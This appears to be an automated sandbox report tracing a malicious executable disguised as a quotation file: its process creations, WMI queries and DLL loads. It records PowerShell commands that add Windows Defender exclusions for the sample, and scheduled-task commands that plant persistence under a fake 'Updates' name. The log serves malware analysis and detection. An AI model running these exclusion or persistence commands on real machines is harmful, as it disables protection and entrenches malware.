                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: rQuotation3200025006.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeFile read: C:\Users\user\Desktop\rQuotation3200025006.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\rQuotation3200025006.exe "C:\Users\user\Desktop\rQuotation3200025006.exe"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Users\user\Desktop\rQuotation3200025006.exe "C:\Users\user\Desktop\rQuotation3200025006.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp4705.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp6606.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Users\user\Desktop\rQuotation3200025006.exe "C:\Users\user\Desktop\rQuotation3200025006.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp"
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeProcess created: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp4705.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp6606.tmp"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeSection loaded: wintypes.dll
